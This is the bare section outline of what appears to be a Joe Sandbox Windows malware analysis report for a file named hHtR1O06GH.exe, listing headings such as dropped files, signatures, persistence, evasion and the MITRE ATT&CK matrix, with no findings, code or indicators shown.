PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
hHtR1O06GH.exe